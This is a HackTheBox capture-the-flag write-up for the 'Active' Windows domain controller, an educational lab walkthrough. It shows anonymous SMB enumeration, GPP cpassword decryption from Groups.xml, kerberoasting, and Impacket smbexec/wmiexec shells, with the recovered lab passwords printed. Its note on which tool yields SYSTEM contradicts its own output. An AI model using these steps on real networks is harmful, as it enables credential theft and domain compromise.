Active HackTheBox Writeup
Active is an easy rated windows machine on hackthebox by eks and mrb3n. Groups.xml was found on a smb mount containing the encrypted credentials for a account of which the decrypting keys were public. So, the cipher was decrypted and the password was valid for the account. Administrator account was kerberoastable whose hash was cracked to get root on the machine.
Nmap
Initial Scan
# Nmap 7.80 scan initiated Sun Jul 4 09:48:35 2021 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.100
Increasing send delay for 10.10.10.100 from 0 to 5 due to 258 out of 858 dropped probes since last increase.
Nmap scan report for 10.10.10.100
Host is up (0.096s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 04:03:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-04T04:04:50
|_ start_date: 2021-07-03T18:25:00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 4 09:51:56 2021 -- 1 IP address (1 host up) scanned in 201.76 seconds
- We can see a lot of ports open.
- Since, dns(53), kerberos(88) and ldap(389) is open, we can assume that the machine might be a active directory domain controller.
- We also get a domain name : active.htb, which we will add to our hosts file.
Checking SMB on Port 445
is anonymous login enabled?
reddevil@ubuntu:~/Documents/htb/retired/active$ smbclient -N -L 10.10.10.100
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
- It is enabled and we can see the shares.
- Among all of the shares, Replication is not a default one. So let us check if we have a read permission on that share.
Checking if Replication share is readable
reddevil@ubuntu:~/Documents/htb/retired/active$ smbclient -N //active.htb/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
We get a smb shell.
Listing the contents of Replication share
smb: \> dir
. D 0 Sat Jul 21 16:22:44 2018
.. D 0 Sat Jul 21 16:22:44 2018
active.htb D 0 Sat Jul 21 16:22:44 2018
10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\> dir
. D 0 Sat Jul 21 16:22:44 2018
.. D 0 Sat Jul 21 16:22:44 2018
DfsrPrivate DHS 0 Sat Jul 21 16:22:44 2018
Policies D 0 Sat Jul 21 16:22:44 2018
scripts D 0 Thu Jul 19 00:33:57 2018
10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\>
Listing the file contents recursively
smb: \active.htb\> recurse ON
smb: \active.htb\> dir
First I turn on the recurse option, and if i do dir, it will list all the files and folder recursively.
Among all of the files, Groups.xml looks interesting.
Reading this article, I found that this file contains the password for the local users which is used to replicate across the different devices on the domain and is encrypted using AES. Also the key for decryption was made public by the microsoft which means we can easily decrypt the hash and get the password.
Downloading and reading the content
smb: \> get \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
- We get a username and a hash.
SVC_TGS:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Decrypting the hash
To decrypt we need encryption key and an IV.
From this repo, I got the key, IV and the mode of AES encryption.
Using cyberchef to decrypt the hash
We get the password for the svc_tgs.
Checking if the creds are valid
reddevil@ubuntu:~/Documents/htb/retired/active$ cme smb active.htb -u user -p pass
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
We have valid creds.
Listing the shares
Doesnot look like we can do much with it. We can read few default shares and the Replication share.
Checking if there are any kerberoastable users
- Those accounts which have their Service Principal Name(SPN) set are kerberoastable. Usually these accounts are service accounts.
- For kerberoastable account, we can request a TGS and some portion of data inside this TGS is encrypted with the NTLM hash of the service account which we can try and crack offline.
- To request for TGS, we must have a valid account on the domain.
Since we have a valid account on the domain, we can request for the TGS, if there are any accounts associated with the services.
We do have a account and we get the hash back.
Trying to crack the hash using hashcat
And we can see that the hash cracks successfully.
Testing the account with cme
reddevil@ubuntu:~/Documents/htb/retired/active$ cme smb active.htb -u administrator -p Ticketmaster1968
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
- It says pwned so it means that we can get a shell.
- we can use wmiexec or smbexec to get a shell.
- The difference is that we get a shell as
administratorwith smbexec whereasnt authority\systemas wmiexec.
Getting a shell as system
reddevil@ubuntu:~/Documents/htb/retired/active$ smbexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
Shell as administrator
reddevil@ubuntu:~/Documents/htb/retired/active$ wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
Reading flags
user.txt
C:\Windows\system32>type c:\users\svc_tgs\desktop\user.txt
86d67*********aa4d10159e983
root.txt
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
b5fc76d**********54d0f708b